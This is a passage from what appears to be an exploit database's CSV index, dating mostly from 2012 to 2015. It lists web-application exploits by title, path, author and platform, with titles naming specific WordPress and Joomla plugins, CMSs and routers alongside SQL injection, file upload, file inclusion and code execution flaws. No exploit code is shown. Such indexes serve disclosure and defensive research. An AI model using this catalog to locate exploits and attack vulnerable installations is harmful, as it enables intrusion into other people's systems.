Cross-Site Scripting",2012-04-27,farbodmahini,webapps,php, +37119,exploits/asp/webapps/37119.txt,"XM Forum - 'id' Multiple SQL Injections",2012-04-27,"Farbod Mahini",webapps,asp, +37120,exploits/php/webapps/37120.txt,"Uiga FanClub - 'p' SQL Injection",2012-04-27,"Farbod Mahini",webapps,php, +37121,exploits/asp/webapps/37121.txt,"BBSXP CMS - Multiple SQL Injections",2012-04-27,"Farbod Mahini",webapps,asp, +37122,exploits/php/webapps/37122.txt,"Shawn Bradley PHP Volunteer Management 1.0.2 - 'id' SQL Injection",2012-04-28,eidelweiss,webapps,php, +37123,exploits/php/webapps/37123.txt,"WordPress Plugin WPsc MijnPress - 'rwflush' Cross-Site Scripting",2012-04-30,Am!r,webapps,php, +37125,exploits/php/webapps/37125.txt,"MySQLDumper 1.24.4 - 'restore.php?Filename' Cross-Site Scripting",2012-04-27,AkaStep,webapps,php, +37126,exploits/perl/webapps/37126.txt,"MySQLDumper 1.24.4 - 'install.php?language' Traversal Arbitrary File Access",2012-04-27,AkaStep,webapps,perl, +37127,exploits/php/webapps/37127.txt,"MySQLDumper 1.24.4 - 'install.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-27,AkaStep,webapps,php, +37128,exploits/php/webapps/37128.txt,"MySQLDumper 1.24.4 - 'sql.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-27,AkaStep,webapps,php, +37129,exploits/php/webapps/37129.txt,"MySQLDumper 1.24.4 - 'filemanagement.php?f' Traversal Arbitrary File Access",2012-04-27,AkaStep,webapps,php, +37130,exploits/php/webapps/37130.txt,"MySQLDumper 1.24.4 - Multiple Script Direct Request Information Disclosures",2012-04-27,AkaStep,webapps,php, +37131,exploits/php/webapps/37131.txt,"MySQLDumper 1.24.4 - 'main.php' Multiple Cross-Site Request Forgery Vulnerabilities",2012-04-27,AkaStep,webapps,php, +37132,exploits/php/webapps/37132.txt,"WordPress Plugin Free Counter 1.1 - Persistent Cross-Site Scripting",2015-05-27,"Panagiotis Vagenas",webapps,php,80 +37133,exploits/php/webapps/37133.txt,"MySQLDumper 1.24.4 - 'index.php?page' Cross-Site Scripting",2012-04-27,AkaStep,webapps,php, +37134,exploits/php/webapps/37134.php,"MySQLDumper 1.24.4 - 'menu.php' PHP Remote Code Execution",2012-04-27,AkaStep,webapps,php, +37135,exploits/hardware/webapps/37135.txt,"iGuard Security Access Control Device Firmware 3.6.7427A - Cross-Site Scripting",2012-05-02,"Usman Saeed",webapps,hardware, +37136,exploits/php/webapps/37136.txt,"Trombinoscope 3.x - 'photo.php' Server SQL Injection",2012-05-07,"Ramdan Yantu",webapps,php, +37137,exploits/php/webapps/37137.txt,"Schneider Electric Telecontrol Kerweb 3.0.0/6.0.0 - 'kw.dll' HTML Injection",2012-05-06,phocean,webapps,php, +37138,exploits/php/webapps/37138.txt,"Ramui Forum Script - 'query' Cross-Site Scripting",2012-05-07,3spi0n,webapps,php, +37139,exploits/php/webapps/37139.txt,"JibberBook 2.3 - 'Login_form.php' Authentication Bypass",2012-05-07,L3b-r1'z,webapps,php, +37140,exploits/php/webapps/37140.html,"PHP Enter 4.1.2 - 'banners.php' PHP Code Injection",2012-05-08,L3b-r1'z,webapps,php, +37142,exploits/php/webapps/37142.txt,"OrangeHRM 2.7 RC - '/plugins/ajaxCalls/haltResumeHsp.php?hspSummaryId' SQL Injection",2012-05-09,"High-Tech Bridge SA",webapps,php, +37143,exploits/php/webapps/37143.txt,"OrangeHRM 2.7 RC - '/plugins/ajaxCalls/haltResumeHsp.php?newHspStatus' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",webapps,php, +37144,exploits/php/webapps/37144.txt,"OrangeHRM 2.7 RC - '/templates/hrfunct/emppop.php?sortOrder1' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",webapps,php, +37145,exploits/php/webapps/37145.txt,"OrangeHRM 2.7 RC - 'index.php?URI' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",webapps,php, +37146,exploits/php/webapps/37146.txt,"PivotX 2.3.2 - 'ajaxhelper.php' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",webapps,php, +37147,exploits/php/webapps/37147.txt,"Chevereto 1.91 - '/Upload/engine.php?v' Cross-Site Scripting",2012-05-10,AkaStep,webapps,php, +37148,exploits/php/webapps/37148.txt,"Chevereto 1.91 - '/Upload/engine.php?v' Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,webapps,php, +37151,exploits/php/webapps/37151.txt,"TCPDF Library 5.9 - Arbitrary File Deletion",2015-05-29,"Filippo Roncari",webapps,php,80 +37154,exploits/hardware/webapps/37154.rb,"ESC 8832 Data Controller - Multiple Vulnerabilities",2015-05-29,"Balazs Makany",webapps,hardware,80 +37155,exploits/php/webapps/37155.txt,"WordPress Plugin WP-FaceThumb 0.1 - 'pagination_wp_facethum' Cross-Site Scripting",2012-05-13,d3v1l,webapps,php, +37161,exploits/php/webapps/37161.txt,"WordPress Plugin GRAND Flash Album Gallery 1.71 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",webapps,php, +37162,exploits/php/webapps/37162.txt,"WordPress Plugin Dynamic Widgets 1.5.1 - 'themes.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",webapps,php, +37166,exploits/php/webapps/37166.php,"WordPress Plugin dzs-zoomsounds 2.0 - Arbitrary File Upload",2015-06-01,"nabil chris",webapps,php, +37172,exploits/hardware/webapps/37172.txt,"Aruba ClearPass Policy Manager - Persistent Cross-Site Scripting",2015-06-01,"Cristiano Maruti",webapps,hardware, +37174,exploits/php/webapps/37174.txt,"WordPress Plugin Network Publisher 5.0.1 - 'networkpub_key' Cross-Site Scripting",2012-05-15,"Heine Pedersen",webapps,php, +37176,exploits/php/webapps/37176.txt,"WordPress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",webapps,php, +37177,exploits/php/webapps/37177.txt,"WordPress Plugin CataBlog 1.6 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",webapps,php, +37178,exploits/php/webapps/37178.txt,"WordPress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",webapps,php, +37179,exploits/php/webapps/37179.txt,"WordPress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",webapps,php, +37180,exploits/php/webapps/37180.txt,"WordPress Plugin NewsLetter Manager 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",webapps,php, +37185,exploits/hardware/webapps/37185.py,"Seagate Central 2014.0410.0026-F - Remote Facebook Access Token",2015-06-03,"Jeremy Brown",webapps,hardware, +37182,exploits/php/webapps/37182.txt,"WordPress Plugin LeagueManager 3.9.11 - SQL Injection",2015-06-02,javabudd,webapps,php, +37189,exploits/php/webapps/37189.txt,"WordPress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",webapps,php, +37190,exploits/php/webapps/37190.txt,"WordPress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",webapps,php, +37191,exploits/php/webapps/37191.txt,"WordPress Plugin Leaflet Maps Marker 0.0.1 - 'leaflet_layer.php?id' Cross-Site Scripting",2012-05-15,"Heine Pedersen",webapps,php, +37192,exploits/php/webapps/37192.txt,"WordPress Plugin Leaflet Maps Marker 0.0.1 - 'leaflet_marker.php?id' Cross-Site Scripting",2012-05-15,"Heine Pedersen",webapps,php, +37193,exploits/php/webapps/37193.txt,"WordPress Plugin GD Star Rating 1.9.16 - 'tpl_section' Cross-Site Scripting",2012-05-15,"Heine Pedersen",webapps,php, +37194,exploits/php/webapps/37194.txt,"WordPress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",webapps,php, +37195,exploits/php/webapps/37195.txt,"WordPress Plugin WP Forum Server 1.7.3 - '/fs-admin/fs-admin.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",webapps,php, +37196,exploits/php/webapps/37196.txt,"WordPress Plugin Pretty Link Lite 1.5.2 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",webapps,php, +37200,exploits/php/webapps/37200.txt,"WordPress Plugin zM Ajax Login & Register 1.0.9 - Local File Inclusion",2015-06-04,"Panagiotis Vagenas",webapps,php,80 +37201,exploits/php/webapps/37201.txt,"WordPress Plugin Sharebar 1.2.1 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",webapps,php, +37202,exploits/php/webapps/37202.txt,"WordPress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",webapps,php, +37203,exploits/php/webapps/37203.txt,"WordPress Plugin Soundcloud Is Gold 2.1 - 'width' Cross-Site Scripting",2012-05-15,"Heine Pedersen",webapps,php, +37204,exploits/php/webapps/37204.txt,"WordPress Plugin Track That Stat 1.0.8 - Cross-Site Scripting",2012-05-15,"Heine Pedersen",webapps,php, +37205,exploits/php/webapps/37205.txt,"LongTail JW Player - 'debug' Cross-Site Scripting",2012-05-16,gainover,webapps,php, +37206,exploits/php/webapps/37206.txt,"SiliSoftware PHPThumb() 1.7.11-201108081537 - '/demo/PHPThumb.demo.showpic.php?title' Cross-Site Scripting",2012-05-16,"Gjoko Krstic",webapps,php, +37207,exploits/php/webapps/37207.txt,"SiliSoftware PHPThumb() 1.7.11-201108081537 - '/demo/PHPThumb.demo.random.php?dir' Cross-Site Scripting",2012-05-16,"Gjoko Krstic",webapps,php, +37208,exploits/php/webapps/37208.txt,"backupDB() 1.2.7a - 'onlyDB' Cross-Site Scripting",2012-05-16,LiquidWorm,webapps,php, +37209,exploits/php/webapps/37209.txt,"WordPress Plugin Really Simple Guest Post 1.0.6 - Local File Inclusion",2015-06-05,Kuroi'SH,webapps,php, +37213,exploits/ios/webapps/37213.txt,"WiFi HD 8.1 - Directory Traversal / Denial of Service",2015-06-06,"Wh1t3Rh1n0 (Michael Allen)",webapps,ios, +37214,exploits/hardware/webapps/37214.txt,"Broadlight Residential Gateway DI3124 - Unauthenticated Remote DNS Change",2015-06-06,"Todor Donev",webapps,hardware, +37252,exploits/php/webapps/37252.txt,"WordPress Plugin RobotCPA V5 - Local File Inclusion",2015-06-10,T3N38R15,webapps,php,80 +37216,exploits/php/webapps/37216.txt,"Unijimpe Captcha - 'captchademo.php' Cross-Site Scripting",2012-05-16,"Daniel Godoy",webapps,php, +37217,exploits/php/webapps/37217.txt,"ArtiPHP 5.5.0 Neo - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Gjoko Krstic",webapps,php, +37219,exploits/php/webapps/37219.txt,"PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Stefan Schurtz",webapps,php, +37220,exploits/jsp/webapps/37220.txt,"OpenKM 5.1.7 - Cross-Site Request Forgery",2012-05-03,"Cyrill Brunschwiler",webapps,jsp, +37221,exploits/jsp/webapps/37221.txt,"Atlassian JIRA FishEye 2.5.7 / Crucible 2.5.7 Plugins - XML Parsing Security",2012-05-17,anonymous,webapps,jsp, +37222,exploits/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/file_upload_submit.asp' Multiple Arbitrary File Upload / Code Executions",2012-05-21,"Aung Khant",webapps,asp, +37223,exploits/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/browse.asp?path' Traversal Arbitrary File Access",2012-05-21,"Aung Khant",webapps,asp, +37224,exploits/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Cross-Site Scripting",2012-05-21,MustLive,webapps,php, +37225,exploits/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Vulnerabilities",2012-05-20,AkaStep,webapps,php, +37226,exploits/php/webapps/37226.txt,"Concrete5 FlashUploader - Arbitrary '.SWF' File Upload",2012-05-20,AkaStep,webapps,php, +37350,exploits/php/webapps/37350.txt,"AdaptCMS 2.0.2 TinyURL Plugin - 'index.php?id' SQL Injection",2012-06-03,KedAns-Dz,webapps,php, +37351,exploits/php/webapps/37351.txt,"AdaptCMS 2.0.2 TinyURL Plugin - 'admin.php' Multiple SQL Injections",2012-06-03,KedAns-Dz,webapps,php, +37352,exploits/php/webapps/37352.txt,"Ignite Solutions CMS - 'car-details.php' SQL Injection",2012-06-03,Am!r,webapps,php, +37353,exploits/php/webapps/37353.php,"WordPress Plugin Nmedia WordPress Member Conversation 1.35.0 - 'doupload.php' Arbitrary File Upload",2015-06-05,"Sammy FORGIT",webapps,php, +37248,exploits/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - 'related.php?program' Blind SQL Injection",2015-06-09,Pancaker,webapps,php, +37237,exploits/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",webapps,hardware, +37238,exploits/hardware/webapps/37238.txt,"TP-Link TD-W8950ND ADSL2+ - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",webapps,hardware, +37240,exploits/hardware/webapps/37240.txt,"D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change",2015-06-08,"Todor Donev",webapps,hardware, +37241,exploits/hardware/webapps/37241.txt,"D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",webapps,hardware, +37243,exploits/php/webapps/37243.txt,"WordPress Plugin Wp-ImageZoom 1.1.0 - Multiple Vulnerabilities",2015-06-08,T3N38R15,webapps,php,80 +37244,exploits/php/webapps/37244.txt,"WordPress Plugin WP Mobile Edition - Local File Inclusion",2015-06-08,"Ali Khalil",webapps,php, +37245,exploits/php/webapps/37245.txt,"Pasworld - 'detail.php' Blind SQL Injection",2015-06-08,"Sebastian khan",webapps,php, +37266,exploits/php/webapps/37266.txt,"ClickHeat 1.14 - Cross-Site Request Forgery (Change Admin Password)",2015-06-12,"David Shanahan",webapps,php,80 +37250,exploits/xml/webapps/37250.txt,"HP WebInspect 10.4 - XML External Entity Injection",2015-06-10,"Jakub Palaczynski",webapps,xml, +39479,exploits/ios/webapps/39479.txt,"InstantCoder 1.0 iOS - Multiple Vulnerabilities",2016-02-22,Vulnerability-Lab,webapps,ios, +37298,exploits/hardware/webapps/37298.txt,"Apexis IP CAM - Information Disclosure",2015-06-16,"Sunplace Solutions",webapps,hardware,80 +37301,exploits/php/webapps/37301.txt,"TYPO3 Extension Akronymmanager 0.5.0 - SQL Injection",2015-06-16,"RedTeam Pentesting",webapps,php,80 +37302,exploits/php/webapps/37302.txt,"E-Detective Lawful Interception System - Multiple Vulnerabilities",2015-06-16,"Mustafa Al-Bassam",webapps,php, +37304,exploits/php/webapps/37304.txt,"BlackCat CMS 1.1.1 - Arbitrary File Download",2015-06-17,d4rkr0id,webapps,php,80 +37305,exploits/php/webapps/37305.txt,"Plogger Photo Gallery - SQL Injection",2012-05-22,"Eyup CELIK",webapps,php, +37307,exploits/php/webapps/37307.txt,"PHPhq.Net phAlbum 1.5.1 - 'index.php' Cross-Site Scripting",2012-05-21,"Eyup CELIK",webapps,php, +37308,exploits/php/webapps/37308.txt,"Ruubikcms 1.1.x - Cross-Site Scripting / Information Disclosure / Directory Traversal",2012-05-23,AkaStep,webapps,php, +37309,exploits/php/webapps/37309.txt,"phpCollab 2.5 - Database Backup Information Disclosure",2012-05-23,"team ' & 1=1--",webapps,php, +37310,exploits/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 - Local File Inclusion",2012-05-23,AkaStep,webapps,php, +37311,exploits/php/webapps/37311.txt,"Pligg CMS 1.x - 'module.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-23,"High-Tech Bridge SA",webapps,php, +37312,exploits/php/webapps/37312.txt,"pragmaMx 1.12.1 - 'modules.php' URI Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",webapps,php, +37313,exploits/php/webapps/37313.txt,"pragmaMx 1.12.1 - '/includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php?img_url' Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",webapps,php, +37314,exploits/php/webapps/37314.txt,"Yellow Duck Framework 2.0 Beta1 - Local File Disclosure",2012-05-23,L3b-r1'z,webapps,php, +37315,exploits/php/webapps/37315.txt,"PHPCollab 2.5 - 'uploadfile.php' Crafted Request Arbitrary Non-PHP File Upload",2012-05-24,"team ' & 1=1--",webapps,php, +37257,exploits/php/webapps/37257.txt,"FiverrScript - Cross-Site Request Forgery (Add Admin)",2015-06-10,"Mahmoud Gamal",webapps,php,80 +37258,exploits/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams - Remote File Disclosure",2015-06-10,"Viktor Minin",webapps,hardware, +37259,exploits/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",webapps,php,443 +37260,exploits/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",webapps,jsp,8080 +37261,exploits/hardware/webapps/37261.txt,"Alcatel-Lucent OmniSwitch - Cross-Site Request Forgery",2015-06-10,"RedTeam Pentesting",webapps,hardware,80 +37263,exploits/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,webapps,php,80 +37264,exploits/php/webapps/37264.txt,"WordPress Plugin Encrypted Contact Form 1.0.4 - Cross-Site Request Forgery",2015-06-10,"Nitin Venkatesh",webapps,php,80 +37270,exploits/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,webapps,php,80 +37271,exploits/multiple/webapps/37271.txt,"Opsview 4.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2015-06-12,"Dolev Farhi",webapps,multiple,80 +37272,exploits/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,webapps,jsp,8080 +37274,exploits/php/webapps/37274.txt,"WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal",2015-06-12,"Larry W. Cashdollar",webapps,php,80 +37275,exploits/php/webapps/37275.txt,"WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload",2015-06-12,"Larry W. Cashdollar",webapps,php,80 +37283,exploits/php/webapps/37283.txt,"AZ Photo Album - Cross-Site Scripting / Arbitrary File Upload",2012-05-20,"Eyup CELIK",webapps,php, +37316,exploits/php/webapps/37316.txt,"phpCollab 2.5 - Unauthenticated Direct Request Multiple Protected Page Access",2012-05-24,"team ' & 1=1--",webapps,php, +37354,exploits/php/webapps/37354.py,"Bigware Shop 2.1x - 'main_bigware_54.php' SQL Injection",2012-06-05,rwenzel,webapps,php, +37290,exploits/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - '/admin/login.php' Authentication Bypass",2015-06-15,"walid naceri",webapps,php, +37329,exploits/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 - Multiple SQL Injections / Local File Inclusion",2012-05-27,n4ss1m,webapps,php, +37330,exploits/php/webapps/37330.txt,"Yamamah Photo Gallery 1.1 - Database Information Disclosure",2012-05-28,L3b-r1'z,webapps,php, +37331,exploits/php/webapps/37331.py,"WHMCompleteSolution (WHMCS) - 'boleto_bb.php' SQL Injection",2012-05-29,dex,webapps,php, +37296,exploits/php/webapps/37296.txt,"Ektron CMS 9.10 SP1 (Build 9.1.0.184.1.114) - Cross-Site Request Forgery",2015-06-16,"Jerold Hoong",webapps,php, +37317,exploits/php/webapps/37317.txt,"AzDGDatingMedium 1.9.3 - Multiple Remote Vulnerabilities",2012-05-27,AkaStep,webapps,php, +37318,exploits/php/webapps/37318.txt,"phpList 2.10.9 - 'Sajax.php' PHP Code Injection",2012-05-26,L3b-r1'z,webapps,php, +37319,exploits/windows/webapps/37319.html,"Tango DropBox 3.1.5 + PRO - Activex HeapSpray",2015-06-19,metacom,webapps,windows, +37320,exploits/windows/webapps/37320.html,"Tango FTP 1.0 (Build 136) - Activex HeapSpray",2015-06-19,metacom,webapps,windows, +37321,exploits/php/webapps/37321.txt,"DynPage 1.0 - 'ckfinder' Multiple Arbitrary File Upload Vulnerabilities",2012-05-25,KedAns-Dz,webapps,php, +37322,exploits/multiple/webapps/37322.txt,"ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities",2015-06-19,Vulnerability-Lab,webapps,multiple, +37323,exploits/hardware/webapps/37323.txt,"ZTE ZXV10 W300 v3.1.0c_DR0 - UI Session Delete",2015-06-19,Vulnerability-Lab,webapps,hardware, +37325,exploits/multiple/webapps/37325.txt,"Lively Cart - SQL Injection",2015-06-19,"Manish Tanwar",webapps,multiple, +37328,exploits/php/webapps/37328.php,"Small-Cms - 'hostname' Remote PHP Code Injection",2012-05-26,L3b-r1'z,webapps,php, +37355,exploits/php/webapps/37355.txt,"MyBB 1.6.8 - 'member.php' SQL Injection",2012-06-06,MR.XpR,webapps,php, +37356,exploits/php/webapps/37356.txt,"WordPress Plugin Email NewsLetter 8.0 - 'option' Information Disclosure",2012-06-07,"Sammy FORGIT",webapps,php, +37357,exploits/php/webapps/37357.php,"WordPress Plugin VideoWhisper Video Presentation 3.17 - 'vw_upload.php' Arbitrary File Upload",2012-06-07,"Sammy FORGIT",webapps,php, +37337,exploits/php/webapps/37337.txt,"WHMCompleteSolution (WHMCS) 5.0 - Cross-Site Request Forgery (Multiple Application Function)",2012-05-31,"Shadman Tanjim",webapps,php, +37338,exploits/php/webapps/37338.txt,"WHMCompleteSolution (WHMCS) 5.0 - 'KnowledgeBase.php?search' Cross-Site Scripting",2012-05-31,"Shadman Tanjim",webapps,php, +37339,exploits/php/webapps/37339.txt,"VoipNow Professional 2.5.3 - 'nsextt' Cross-Site Scripting",2012-06-01,Aboud-el,webapps,php, +37340,exploits/php/webapps/37340.html,"TinyCMS 1.3 - Arbitrary File Upload / Cross-Site Request Forgery",2012-06-03,KedAns-Dz,webapps,php, +37341,exploits/php/webapps/37341.txt,"TinyCMS 1.3 - 'index.php?page' Traversal Local File Inclusion",2012-06-03,KedAns-Dz,webapps,php, +37342,exploits/php/webapps/37342.txt,"TinyCMS 1.3 - '/admin/admin.php?do' Traversal Local File Inclusion",2012-06-03,KedAns-Dz,webapps,php, +37816,exploits/multiple/webapps/37816.txt,"Cisco Unified Communications Manager - Multiple Vulnerabilities",2015-08-18,"Bernhard Mueller",webapps,multiple, +37815,exploits/php/webapps/37815.txt,"vBulletin < 4.2.2 - Memcache Remote Code Execution",2015-08-18,"Joshua Rogers",webapps,php,80 +39249,exploits/php/webapps/39249.txt,"WeBid - Multiple Cross-Site Scripting / LDAP Injection Vulnerabilities",2014-07-10,"Govind Singh",webapps,php, +37440,exploits/php/webapps/37440.txt,"Watchguard XCS 10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,webapps,php, +37360,exploits/php/webapps/37360.txt,"GeniXCMS 0.0.3 - Cross-Site Scripting",2015-06-24,hyp3rlinx,webapps,php,80 +37361,exploits/php/webapps/37361.txt,"WordPress Plugin Huge-IT Slider 2.7.5 - Multiple Vulnerabilities",2015-06-24,"i0akiN SEC-LABORATORY",webapps,php, +37363,exploits/php/webapps/37363.txt,"GeniXCMS 0.0.3 - 'register.php' SQL Injection",2015-06-24,cfreer,webapps,php,80 +37364,exploits/php/webapps/37364.txt,"Joomla! Component com_simpleimageupload - Arbitrary File Upload",2015-06-24,CrashBandicot,webapps,php,80 +37369,exploits/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",webapps,php, +37370,exploits/php/webapps/37370.php,"WordPress Plugin FCChat Widget 2.2.x - 'upload.php' Arbitrary File Upload",2012-06-07,"Sammy FORGIT",webapps,php, +37371,exploits/php/webapps/37371.php,"WordPress Plugin Picturesurf Gallery - 'upload.php' Arbitrary File Upload",2012-06-03,"Sammy FORGIT",webapps,php, +37372,exploits/java/webapps/37372.html,"BMC Identity Management - Cross-Site Request Forgery",2012-06-11,"Travis Lee",webapps,java, +37373,exploits/php/webapps/37373.php,"WordPress Plugin Contus Video Gallery - 'upload1.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",webapps,php, +37374,exploits/php/webapps/37374.txt,"Joomla! Component com_alphacontent - 'limitstart' SQL Injection",2012-06-10,xDarkSton3x,webapps,php, +37375,exploits/php/webapps/37375.php,"Joomla! Component Joomsport - SQL Injection / Arbitrary File Upload",2012-06-11,KedAns-Dz,webapps,php, +37376,exploits/php/webapps/37376.php,"XOOPS Cube PROJECT FileManager - 'xupload.php' Arbitrary File Upload",2012-06-12,KedAns-Dz,webapps,php, +37377,exploits/php/webapps/37377.php,"WordPress Plugin HD FLV Player - 'uploadVideo.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",webapps,php, +37378,exploits/php/webapps/37378.php,"Joomla! Component com_simpleswfupload - 'uploadhandler.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",webapps,php, +37379,exploits/php/webapps/37379.php,"Joomla! Component mod_artuploader - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",webapps,php, +37380,exploits/php/webapps/37380.php,"Joomla! Component DentroVideo 1.2 - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",webapps,php, +37381,exploits/php/webapps/37381.html,"Joomla! Component IDoEditor - 'image.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",webapps,php, +37382,exploits/php/webapps/37382.php,"Joomla! Component mod_jfancy - 'script.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",webapps,php, +37383,exploits/php/webapps/37383.php,"Joomla! Component Easy Flash Uploader - 'helper.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",webapps,php, +37387,exploits/php/webapps/37387.txt,"Koha 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php, +37388,exploits/php/webapps/37388.txt,"Koha 3.20.1 - Directory Traversal",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php, +37389,exploits/php/webapps/37389.txt,"Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php, +37394,exploits/multiple/webapps/37394.txt,"Thycotic Secret Server 8.8.000004 - Persistent Cross-Site Scripting",2015-06-26,"Marco Delai",webapps,multiple, +37395,exploits/windows/webapps/37395.txt,"ManageEngine Asset Explorer 6.1 - Persistent Cross-Site Scripting",2015-06-26,"Suraj Krishnaswami",webapps,windows, +37397,exploits/php/webapps/37397.html,"SPIP 2.x - Multiple Cross-Site Scripting Vulnerabilities",2012-06-13,anonymous,webapps,php, +37398,exploits/php/webapps/37398.php,"Zimplit CMS 3.0 - Local File Inclusion / Arbitrary File Upload",2012-06-13,KedAns-Dz,webapps,php, +37399,exploits/php/webapps/37399.php,"WordPress Plugin Evarisk - 'uploadPhotoApres.php' Arbitrary File Upload",2012-01-14,"Sammy FORGIT",webapps,php, +37403,exploits/php/webapps/37403.php,"WordPress Plugin Invit0r - 'ofc_upload_image.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",webapps,php, +37404,exploits/php/webapps/37404.txt,"MediaWiki 1.x - 'uselang' Cross-Site Scripting",2012-06-17,anonymous,webapps,php, +37406,exploits/php/webapps/37406.php,"WordPress Plugin Zingiri Web Shop 2.4.3 - 'uploadfilexd.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",webapps,php, +37407,exploits/php/webapps/37407.txt,"ADICO - 'index.php' Script SQL Injection",2012-06-15,"Ibrahim El-Sayed",webapps,php, +37408,exploits/php/webapps/37408.txt,"Simple Forum PHP - Multiple SQL Injections",2012-06-14,"Vulnerability Research Laboratory",webapps,php, +37409,exploits/php/webapps/37409.txt,"NetArt Media Jobs Portal - SQL Injection",2012-06-14,"Ibrahim El-Sayed",webapps,php, +37410,exploits/php/webapps/37410.php,"Joomla! Component hwdVideoShare - 'flash_upload.php' Arbitrary File Upload",2012-06-17,"Sammy FORGIT",webapps,php, +37411,exploits/php/webapps/37411.txt,"WordPress Plugin ORGanizer - Multiple Vulnerabilities",2012-06-15,MustLive,webapps,php, +37412,exploits/php/webapps/37412.php,"Joomla! Component Maian Media - 'uploadhandler.php' Arbitrary File Upload",2012-06-16,"Sammy FORGIT",webapps,php, +37413,exploits/php/webapps/37413.txt,"Joomla! Component JCal Pro Calendar - SQL Injection",2012-06-15,"Taurus Omar",webapps,php, +37414,exploits/php/webapps/37414.txt,"Simple Document Management System 1.1.5 - Multiple SQL Injections",2012-06-16,JosS,webapps,php, +37415,exploits/php/webapps/37415.txt,"Webify (Multiple Products) - Multiple HTML Injection / Local File Inclusions",2012-06-16,snup,webapps,php, +37416,exploits/java/webapps/37416.txt,"Squiz CMS - Multiple Cross-Site Scripting / XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",webapps,java, +37417,exploits/php/webapps/37417.php,"Multiple WordPress Themes - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",webapps,php, +37418,exploits/php/webapps/37418.php,"WordPress Plugin LB Mixed Slideshow - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",webapps,php, +37419,exploits/php/webapps/37419.txt,"WordPress Plugin Wp-ImageZoom - 'file' Remote File 